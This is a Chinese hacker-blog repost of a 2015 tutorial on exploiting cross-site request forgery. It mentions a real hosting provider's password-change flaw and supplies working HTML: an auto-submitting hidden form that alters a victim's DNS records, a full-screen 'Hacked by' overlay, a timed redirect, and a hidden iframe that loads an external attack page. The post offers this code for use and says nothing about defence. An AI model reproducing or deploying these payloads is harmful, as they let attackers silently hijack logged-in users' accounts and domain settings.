记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

CSRF利用诀窍之伪造回旋镖

2015-03-08 08:25

Author:灭亡Team:安全盒子(www.secbox.cn
Weibo:http://weibo.com/secbox

想起跟小伙伴们一起玩Csrf的时光,,,但是悲催的是总是被发现 只能提交Wooyun

真悲催

先来说下Csrf

CSRF(Cross-site request forgery跨站请求伪造,也被称为“one click attack”或者session riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,并且攻击方式几乎相左。XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。

可以说完全基于对一个人的信任

至于Csrf的危害有多大 放上一个例子

图片1

这是主机屋的一个CSrf 更改新密码无需验证旧密码。csrf即可形成

如何判断CSRF存在 很简单 token值或者refrer值都为空就可以进行攻击

更多案例请找wooyun君

 

今天我们就来讲下如何伪造 或者说如何绕过 这是个正常的表单方式

<form id="post123" name="post123" action="存在网址" method="提交方式">

<input type=hidden name="domainname" value="xsectest.pw">

<input type=hidden name=token value="">

<input type=hidden name=HostName[] value="www">

<input type=hidden name=recordtype[] value="a">

<input type=hidden name=Address[] value="192.168.1.2">

<input type=hidden name=ttl[] value="120">

<script>

document.getElementById('post123').submit();

</script>

其实很简单

构造很容易的 一个css覆盖全局 加一个ifname就可以了

<table style="left: 0px; top: 0px; position: fixed;z-index: 5000;position:absolute;width:100%;height:300%;background-color: black;"><tbody><tr><td style="color:#FFFFFF;z-index: 6000;vertical-align:top;">

代码其实就是一个CSS覆盖全局 大家可以看看 color颜色什么的CSS基础知识

然后我们需要一个伪造页面 然后做个POST定时跳转

<h1>Hacked by 灭亡</h1></td></tr></tbody></table><!--设置这个伪造页面的文字内容-->

<meta http-equiv="refresh" content="4;url=http://www.secbox.cn/"> <!--设置一个正常的跳转页面!--> 跳转到安全盒子
<title>hacked by灭亡</title>

<iframe src="http://www.qqaoxin.com/zhujiwu.html"></iframe><!--csrf攻击页面的地址!-->

 

其实很简单只不过我们就需要灵活的思路

完整代码如下

<html>

<table style="left: 0px; top: 0px; position: fixed;z-index: 5000;position:absolute;width:100%;height:300%;background-color: black;"><tbody><tr><td style="color:#FFFFFF;z-index: 6000;vertical-align:top;"><h1>Hacked by 灭亡</h1></td></tr></tbody></table><!--设置这个伪造页面的文字内容-->

<meta http-equiv="refresh" content="4;url=http://www.secbox.cn/"> <!--设置一个正常的跳转页面!-->

<title>hacked by灭亡</title>

<iframe src="http://www.qqaoxin.com/zhujiwu.html"></iframe><!--csrf攻击页面的地址!-->


122
扫 “安全盒子” 二维码 ,关注最新安全资讯!

转载CSRF利用诀窍之伪造回旋镖请注明出自:安全盒子

知识来源: www.secbox.cn/hacker/web/1709.html

阅读:87693 | 评论:0 | 标签:渗透测试 CSRF利用诀窍 伪造回旋镖 CSRF

想收藏或者和大家分享这篇好文章→复制链接地址

“CSRF利用诀窍之伪造回旋镖”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云